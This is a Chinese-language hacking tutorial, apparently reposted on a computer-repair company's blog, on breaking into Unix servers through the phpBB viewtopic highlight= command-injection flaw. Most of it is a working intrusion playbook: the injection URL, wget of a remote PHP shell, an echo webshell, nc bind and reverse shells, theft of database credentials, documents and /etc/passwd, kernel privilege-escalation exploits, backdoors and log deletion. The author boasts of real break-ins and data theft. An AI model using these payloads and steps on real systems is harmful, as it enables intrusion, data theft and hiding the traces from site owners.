phpBB的viewtopic highlight漏洞在unix下的入侵思路
1. 文章作者:
作者:ik www.zuso.org
2. 漏洞名称:
phpBB viewtopic highlight= 漏洞
3. 编写媒介:
虽然这个漏洞出了有一段工夫, 但是到现在还是许多利用者没有更新.近来更是新出了
phpBB2.x&PHP4.3.x unserialize函数内存泄露漏洞.但是很多朋侪拿到了数据库暗码和
文件目次却不晓得如何利用.
颜颜也说没有看过针对phpbb run on unix like system 的应用文章, 我想刚好, 就把一些应用跟思路写了出来.
两个漏洞纷歧样,但是思路我想还是可以鉴戒的.
呵, 废话不多说了, 漏洞是每天有新的,最主要的是你的思路.
4. 漏洞用法:
http://www.xxxx.com/phpBB2/viewtopic.php?t=1&highlight=%2527%252esystem(CMD)%252e%2527
CMD=指令 用 ascii code 编码, like chr(108)%252echr(115) 即为 ls 的意思!
更多 ascii code 请参考 http://www.asciitable.com/ , 这边不多先容啰 :p
5. 我的思路:
一般发明论坛有问题之后, 我的第一步会是先查抄他的权限, 以及我是否有充足权限写入!
用 'id' 会看到你现在的身分! 一般 apache 预设都是 nobody 大概 www !
来探求可以写入的地方吧 'ls -laR' 一般在 ~path/files/ 下面可以写入...试试看!
嗯, 再来查抄 wget 是否存在, 'ls -la /usr/local/bin' 看看有没有 wget...
如果有, 我的下一步便是 'wget -O ~path/files/ik.php
http://www.xfocus.net/tools/200405/PhpShell.php'
(盼望可以写入呀, X客中国那次便是这样玩的!) 成功的话直接在 ~path/files 目次下就可以实行 ik.php 了!
但, 又有问题了, 如果在 bin 下面找不到 wget 怎办? 那就用 echo 吧! (总不会连 echo 最根本的都没吧=_+)
丢一个最小的 php shell 吧! 'echo " system(\$_REQUEST['cmd']); ?>" > ~path/files/ik.php' ! 若能写入就成功了!
用法便是 'http://www.xxx.com/phpBB2/ik.php?cmd=指令' ! 那... 如果都不能写入怎办!? 就此放弃吗? 想太多!
试试看 nc 吧! 把他 bind 一个 port 出来 'nc -l -p 5555 -e /bin/sh' 然后我在 'telnet targetIP 5555' ! 成功的话就进去了!
什么!? 他在 router (IP Share 背面怎办!?) 那就让他本身连回来吧, 先在我的 linux box 下面 'nc -l 6666' 开始监听!
在目的下面再实行 'nc myIP 6666 -e /bin/sh', 如果成功的话, 我的这边就成功获得 shell 了!
那... 如果以上要领都不行怎办!? 总不能就此放弃吧!? 由于是 php 使我不得不想到 phpmyAdmin 呀!
来看看他的 config.php 档吧, 黑不掉首页 拿不到权限, 材料库总该借瞄一下吧!? 瞄不到, 暗码也该借一下吧!?
这个写着 MySQL 连线资讯的档案, 各人应该都会用猫 (cat) 去看! 但有的工夫, cat 并不能利用, 该怎办呢?
找找其他指令吧, 我会用 more config.php 试试, 接着 tail -f config.php 等等! 根本上都可以用的! 若没有该指令就换下一个!
得到这份暗码, 令我想到更多事变可以玩, 我会先 'locate phpmyadmin' 'locate phpadmin' 找出有没有 phpmyadmin!
如果有, 就连到 ~path/phpmyadmin 然后用那组帐号暗码进去帮他备分一下阿, 做人要老实, 黑他之前也要备份一下哩 :p
就像那次我黑 X客中国 便是云云, 将近 500mb 的材料库从中国抓到美国= =, 抓完才帮他扫除材料库呢!
固然啦, 除了帮他备份外, 更别忘了把本身酿成办理员呀, 把 user_lever 改成 1 ! 呵, 酱就可以利用它来发广告信了! 爽 :~
那... 如果没有 phpmyadmin 怎办!? 'nmap targetIP' 看看有没有开 MySQL 啰! 有的话就试试看从我这边本身装个 phpmyadmin...
另外有些情形是, ~path/phpmyadmin 明显就存在, 但是便是 403 Foribben, 怎会酱!? 被 .htaccess 锁住了!
就像那次 www.g***Q.com.tw 一样, 就只能说 'rm -fr ~path/phpadmin/.htaccess' 啰, 砍掉就可以成功登入了, 记得帮他备份呀! :p
完了! 如果没有 phpmyadmin 然后他又不给我开 MySQL 怎办!? 那就试试看其他的, 'pwd' 看看我在哪!?
一般都是 /home/xxxx or /usr/home/xxxx <--- xxxx 一般是谁人网站的办理者在主机下面的利用帐号耶! 试试看呀! 冲~
如果是假造主机的话, 一般暗码都是设一样的, 然后好的是都会开 ftp, 那次谁人 "早安X女" 的网站便是这样呀...
不小心刚好设成一样就进去了, 就帮他传了几个 phpshell.php 也帮他备份了一些影片 :p ( tar 打包真好用 XD)
再惨一点, 就看看那组暗码跟办理员有没有一样!? 有的话就进去把本身变办理员, 当个地下网管来赔偿一下失落的心灵呀 XD
补充几点, 如果你黑进了什么政府大概什么公司的网站的话呀, 除了帮人家被份材料库, 补了 viewtopic.php 外呀, 文件别忘了呀!
'locate *.doc''locate *.ppt' 把途径记上去, 假设是 /home/ik/doc/ 有一堆 *.doc 档案的话...
那就 'tar -cvf * lamik.tar' 然后 'mv lamik.tar ~path/' 接着就 http://www.xxx.com/phpBB2/files/lamik.tar 抓上去吧!?
呵, 我曾经玩过的就差不多这些了, 阿, 'cat /etc/passwd' (for linux) 'cat /etc/master.passwd' (for BSD)
这醒目麻!? 没有暗码呀, 连 md5 都没怎办!? 这个便是把它抓一份上去呀, 然后看看找个 ssh brute force 啥的猜啰!!
6. 若拿到 shell :
拿到 shell 以后能够干麻!? 先看看权限够不敷清 log 吧!? 'locate *-access_log' 找出 apache 放 logs 的目次
然后就 'rm -fr ~path/*-access_log' 根本上权限应该会不足, 但是那次 X客中国 就可以用 :p
在把他 ~/logs 属性改一下, 他就永久不会跑出 log 了 :p 他也不消浪费空间装 log, 也更不消来找我拿材料库呀 :p
如果没办法怎办?! 那就试试看能不能找到 exploits 去拿 r00t 呀, 如果是 linux 的话, 试试下面两个档案好了...
mremap_pte.c 或 ptrace-kmod.c 师父说这两个是最好用的耶 :p 试试看啰 :~
gcc mremap_pte.c; ./a.out 如果成功就酿成 # 了唷! 另外 ptrace-kmod.c 也是一样滴 :~
再不行怎办!? 到 www.securityfocus.com 大概 www.k-otik.com 找找有没有可以用的 exploits 吧!
(补充一下, 可以用 'uname -a' 来确定 kernel 版本, 然后 "对症下药" 会淘汰你许多名贵的工夫唷 :p)
终究这篇文章不是在教你怎样用 exploits 呀+_+, 只是分享一下我的心得, 没啥技能可言的心得 :p
无论如何, 先在下面丢个后门吧, for unix like 的后门,本身 google 吧, 长辈不会允许我分享出来的 :p
实行下去, 让他本身连回我 linux box, 然后就 logoff 吧, 等等网管发明跑来怎办!? 呵, 还是小心点呗 :~
根本上便是这样了, 测试 -> 尝试获得 shell -> 获得 shell 用 exploits 提升权限 -> 开门 -> 清 log
以上几个步调, 能够做到几多就尽量做吧, 记住一句话: 要领永久多一个, 肉鸡永久少一台! 就看你如何应用了 :p
7. 文章备注:
以上只是我的小小心得分享, 彷佛太晚写这篇文章了, 但仍盼望这篇文章对您有所帮助!
这个是我写的第一篇文章, 呵. 不过漏洞真的要少玩点了呀, 好好学习才是着实的吧!?
tt 长辈说过: 黑站黑的越多, 只会让人更怕你; 技能学的越多, 会让人更尊重你!
句句是真理呀, 我们不应在迷糊在黑站的天下里了, 黑归黑, 也别忘了多学点呀! 一同加油吧!
谨以此篇文章作为一点小小的分享, 并送给我最爱的颜颜 :)
8. 版权问题:
这篇只是整理一下我所玩的跟应用的心得罢了, 没什么原创性, 纯属分享 :p
固然, 如果您愿意或以为有收藏价值, 接待转贴或传播, 但请务必连结文章的完整!
有任何问题, 接待一同探讨讨论, 我信箱: fake.ik [at] Zuso.org
本文只是纯分享心得 如果读者因文章而触法 皆与作者无关 .Thanks.
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|